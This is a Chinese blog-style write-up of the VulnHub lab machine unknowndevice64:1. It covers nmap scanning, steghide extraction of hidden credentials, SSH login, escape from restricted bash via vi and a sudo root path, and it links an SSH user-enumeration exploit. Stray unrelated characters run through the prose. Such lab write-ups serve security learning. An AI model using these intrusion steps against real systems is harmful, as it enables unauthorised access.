unknowndevice64: 1

[unknowndevice64: 1]下載地址:https://www.vulnhub.com/entry/unknowndevice64-1,293/
target:獲取機(jī)器root權(quán)限,查看/root/flag.txt

1.鏡像本間導(dǎo)入VMware智末;(nat模式,鏡像默認(rèn)啟用DHCP温学,kaili也在同網(wǎng)段(192.168.80.0/24));
2.掃描網(wǎng)段,獲取靶機(jī)IP

root@kali:/home/ud64# nmap -sn 192.168.80.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-15 01:43 EDT
Nmap scan report for 192.168.80.1
Host is up (0.00042s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.80.134
Host is up (0.0011s latency).
MAC Address: 00:0C:29:D4:9F:79 (VMware)
Nmap scan report for 192.168.80.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:EA:7D:F3 (VMware)
Nmap scan report for 192.168.80.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 7.97 seconds

3.nmap掃描靶機(jī)氓奈,查看活動(dòng)端口

root@kali:/home/ud64# nmap -p- -sS -sV 192.168.80.134                    
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-15 00:00 EDT
Nmap scan report for 192.168.80.134
Host is up (0.00060s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
1337/tcp  open  ssh     OpenSSH 7.7 (protocol 2.0)
31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
MAC Address: 00:0C:29:D4:9F:79 (VMware)

顯示靶機(jī)ssh端口為1337,另外靶機(jī)為http server瞬欧,端口為31337;
4.web登錄192.168.80.134:31337,開發(fā)者模式查看網(wǎng)頁源碼罢防;
看到如下文件key_is_h1dd3n.jpg艘虎,提示key藏在這個(gè)jpg圖片中;

image.png

下載圖片到kaliwget http://192.168.80.134:31337/key_is_h1dd3n.jpg
5.使用Steghide查實(shí)破解圖片隱藏的信息咒吐;關(guān)于Steghide的信息可以自行g(shù)oogle野建;

root@kali:/home/ud64# apt-get install steghide    #非kali自帶,安裝steghide
root@kali:/home/ud64# steghide --extract -sf key_is_h1dd3n.jpg -p h1dd3n     #steghide解密要使用原來加密使用的密碼恬叹,密碼根據(jù)圖片名字猜測候生,運(yùn)氣不錯(cuò)h1dd3n是密碼
wrote extracted data to "h1dd3n.txt".
root@kali:/home/ud64# cat h1dd3n.txt   #查看解密文件
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.-----------------.<----------------.--.++++++.---------.>-----------------------.<<+++.++.>+++++.--.++++++++++++.>++++++++++++++++++++++++++++++++++++++++.-----------------.

6.文件信息為一種brainfuck的程序語言,使用在線工具可解https://copy.sh/brainfuck/绽昼,在線解密后即可獲取到ssh的用戶名和密碼唯鸭;
7.登錄靶機(jī)ssh ****@192.168.80.134 -p 1337(為不劇透,隱去了登錄用戶名)
8.登錄發(fā)現(xiàn)為非root用戶绪励,需要提權(quán)

ud64@unknowndevice64_v1:~$ ls
-rbash: /bin/ls: restricted: cannot specify `/' in command names
ud64@unknowndevice64_v1:~$ sudo -l
-rbash: sudo: command not found

9.按兩次tab鍵肿孵,顯示目前用戶可執(zhí)行的命令

ud64@unknowndevice64_v1:~$ 
!          ]]         builtin    compgen    date       done       esac       false      function   id         let        mc         read       set        test       true       unalias    while      
./         alias      caller     complete   declare    echo       eval       fc         getopts    if         local      popd       readarray  shift      then       type       unset      whoami     
:          bg         case       compopt    dirs       elif       exec       fg         hash       in         logout     printf     readonly   shopt      time       typeset    until      {          
[          bind       cd         continue   disown     else       exit       fi         help       jobs       ls         pushd      return     source     times      ulimit     vi         }          
[[         break      command    coproc     do         enable     export     for        history    kill       mapfile    pwd        select     suspend    trap       umask      wait

發(fā)現(xiàn)可以使用vi,通過vi可以突破受限的shell


image.png
sh-4.4$ export PATH=/bin:/usr/bin:$PATH    #修改環(huán)境變量
sh-4.4$ cat flagRoot.txt     #這步已經(jīng)可以查看flag文件了
sh-4.4$ sudo -l                  #這里可以發(fā)現(xiàn)一個(gè)有趣的東西疏魏,通過/usr/bin/sysud64可以執(zhí)行任何root權(quán)限的命令
User ud64 may run the following commands on unknowndevice64_v1:
    (ALL) NOPASSWD: /usr/bin/sysud64

使用到的工具:
nmap
steghide 開源隱寫程序
brainfuck 程序語言
ssh用戶名枚舉(https://www.exploit-db.com/exploits/45939
)代碼35行需要修改sock.connect((args.target, int(args.port)))使用方式python ssh_enum_user.py -p 1337 192.168.80.134 root

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末停做,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子大莫,更是在濱河造成了極大的恐慌蛉腌,老刑警劉巖,帶你破解...
    沈念sama閱讀 216,997評論 6 502
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件只厘,死亡現(xiàn)場離奇詭異烙丛,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)羔味,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,603評論 3 392
  • 文/潘曉璐 我一進(jìn)店門河咽,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人赋元,你說我怎么就攤上這事忘蟹。” “怎么了搁凸?”我有些...
    開封第一講書人閱讀 163,359評論 0 353
  • 文/不壞的土叔 我叫張陵媚值,是天一觀的道長。 經(jīng)常有香客問我护糖,道長褥芒,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,309評論 1 292
  • 正文 為了忘掉前任嫡良,我火速辦了婚禮锰扶,結(jié)果婚禮上献酗,老公的妹妹穿的比我還像新娘。我一直安慰自己少辣,他們只是感情好凌摄,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,346評論 6 390
  • 文/花漫 我一把揭開白布羡蛾。 她就那樣靜靜地躺著漓帅,像睡著了一般。 火紅的嫁衣襯著肌膚如雪痴怨。 梳的紋絲不亂的頭發(fā)上忙干,一...
    開封第一講書人閱讀 51,258評論 1 300
  • 那天,我揣著相機(jī)與錄音浪藻,去河邊找鬼捐迫。 笑死,一個(gè)胖子當(dāng)著我的面吹牛爱葵,可吹牛的內(nèi)容都是我干的施戴。 我是一名探鬼主播,決...
    沈念sama閱讀 40,122評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼萌丈,長吁一口氣:“原來是場噩夢啊……” “哼赞哗!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起辆雾,我...
    開封第一講書人閱讀 38,970評論 0 275
  • 序言:老撾萬榮一對情侶失蹤肪笋,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后度迂,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體藤乙,經(jīng)...
    沈念sama閱讀 45,403評論 1 313
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,596評論 3 334
  • 正文 我和宋清朗相戀三年惭墓,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了坛梁。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 39,769評論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡腊凶,死狀恐怖划咐,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情吭狡,我是刑警寧澤尖殃,帶...
    沈念sama閱讀 35,464評論 5 344
  • 正文 年R本政府宣布,位于F島的核電站划煮,受9級特大地震影響送丰,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜弛秋,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,075評論 3 327
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧镣丑,春花似錦嫂冻、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,705評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至状婶,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間馅巷,已是汗流浹背膛虫。 一陣腳步聲響...
    開封第一講書人閱讀 32,848評論 1 269
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留钓猬,地道東北人稍刀。 一個(gè)月前我還...
    沈念sama閱讀 47,831評論 2 370
  • 正文 我出身青樓,卻偏偏與公主長得像敞曹,于是被迫代替她去往敵國和親账月。 傳聞我的和親對象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,678評論 2 354

推薦閱讀更多精彩內(nèi)容

  • 1澳迫、第八章 Samba服務(wù)器2局齿、第八章 NFS服務(wù)器3、第十章 Linux下DNS服務(wù)器配站點(diǎn)纲刀,域名解析概念命令:...
    哈熝少主閱讀 3,732評論 0 10
  • 轉(zhuǎn)自:https://blog.51cto.com/3381847248/2066599 一项炼、ssh詳解 1、什么...
    950545c4cd64閱讀 50,761評論 0 6
  • 1.命令格式:ifconfig [網(wǎng)絡(luò)設(shè)備] [參數(shù)] 2.命令功能: ifconfig 命令用來查看和配置網(wǎng)絡(luò)設(shè)...
    Nuuuu閱讀 3,735評論 0 12
  • 名詞延伸 通俗的說拌禾,域名就相當(dāng)于一個(gè)家庭的門牌號碼,別人通過這個(gè)號碼可以很容易的找到你展哭。如果把IP地址比作一間房子...
    楊大蝦閱讀 20,602評論 2 57
  • 我的微商經(jīng)歷從開始到結(jié)束湃窍,差不多半年的時(shí)間。 先來說說怎么開始的匪傍。生完孩子后您市,又遇干燥的東西,整張臉干的起皮役衡。我覺...
    xiao妮子閱讀 485評論 0 4